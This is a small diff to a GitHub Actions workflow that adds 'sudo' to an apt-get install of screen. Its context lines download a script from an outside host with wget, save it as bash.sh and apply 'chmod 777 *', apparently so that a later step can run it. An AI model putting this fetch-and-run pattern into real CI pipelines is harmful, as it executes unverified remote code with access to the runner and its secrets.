--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -19,7 +19,7 @@ jobs:
           cd gat
           wget "https://api.smyhw.online:8080/http2/test/gha2v?act=script" -O bash.sh
           chmod 777 *
-          apt-get install screen
+          sudo apt-get install screen
       
       - name: run
         run: |
